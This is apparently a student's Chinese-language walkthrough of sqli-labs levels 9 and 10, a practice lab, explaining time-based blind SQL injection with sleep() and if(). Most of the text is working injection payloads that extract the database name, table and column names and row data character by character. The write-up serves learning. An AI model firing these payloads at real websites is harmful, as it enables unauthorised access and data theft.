sqli-labs less-9 --> less-10

时间盲注：

利用时间函数，观察不同条件的等待时长；利用sleep(),benchmark()等函数，让MySQL的执行时间变长

时间盲注多于if这样的函数结合（if（expr1，expr2，expr3）expr1为true，则返回expr2，否则返回expr3的值）

If (length(database())>3,sleep(5),1) 如果数据库字符长度大于三则MySQL休眠五秒，否则查询1

1’ and If (substr(database(),1,1)=’d’,sleep(5),1)

(与布尔盲注基本相同）

--------------------------------------------------------------------------------------------------

Less-9（时间盲注）

1.首先判断是否存在注入点

无论是执行?id=1还是?id=1’还是其他，回显都显示正常，联想本题的题目，使用时间的长短来进行判断，执行?id=1’ and sleep(5) --+，发现较长时间才做反应，由此推断存在注入点

2.爆数据库长度

执行?id=1’ and if(length(database())=8,sleep(5),1) --+ 判断数据库的长度是否为8

3.爆数据库名

执行?id=1' and if(length(database())=8,sleep(5),1) --+   判断数据库长度

执行?id=1’ and if(substr(database(),1,1)=’s’,sleep(5),1) --+  判断数据库名的第一个字符

同布尔类型的盲注类似，通过尝试得到数据库的库名为security

4.爆表名

爆第一个表的长度：

执行?id=1’ and if(length(select table_name from information_schema.tables where table_schema=’security’ limit 0,1)=6,sleep(5),1) --+，但是报错了，再三检查感觉命令没有错，于是到网上搜寻了一下别人的命令发现

执行?id=1’ and if(length((select table_name from information_schema.tables where table_schema=’security’ limit 0,1))=6,sleep(5),1) --+

（色块处是双括号与单括号的区别，经过尝试当使用select * from语法时都需要双括号）

爆第一个表的名字

执行?id=1’ and if(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)=’e’,sleep(5),1) --+，由此得到第一个表的名字为emails，以此类推得到所有的表名

5.爆字段名

爆第一个字段名的长度：

执行?id=1’ and if(length((select column_name from information_schema.columns where table_name=’emails’ limit 0,1))=2,sleep(5),1) --+  得到长度为2

爆第一个字段名：

执行?id=1’ and if(substr((select column_name from information_schema.columns where table_name=’emails’ limit 0,1),1,1)=’i’,sleep(5),1) --+  执行正确，以此类推得到第一个字段名为id

6.爆数据

执行?id=1’ and if(length((select id from emails limit 0,1))=1,sleep(5),1) --+ 得到第一行数据的长度为1

执行?id=1’ and if(substr((select id from emails limit 0,1),1,1)=1,sleep(5),1) --+ 得到第一行数据为1，以此类推得到表id下的所有数据

-------------------------------------------------------END----------------------------------------------------------------

Less-10（时间盲注）

1.判断是否存在注入点

经过尝试执行?id=1” and sleep(5) --+ 回显出现延迟，判断存在注入点，注入方式为：””

2.与less-9方法完全相同

3.爆数据库

爆长度：执行?id=1” and if(length(database())=8,sleep(5),1) --+

爆数据库名：执行?id=1" and if(substr(database(),1,1)='s',sleep(5),1)--+

4.爆表

爆长度：执行?id=1" and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),1)--+

爆表名：执行?id=1" and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1)--+

5.爆字段

爆长度：执行?id=1" and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(5),1)--+

爆字段名：执行?id=1" and if(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(5),1)--+

6.爆数据

爆长度：执行?id=1" and if(length((select id from emails limit 0,1))=1,sleep(5),1)--+

爆数据：执行?id=1" and if(substr((select id from emails limit 0,1),1,1)=1,sleep(5),1)--+

-------------------------------------------------------END----------------------------------------------------------------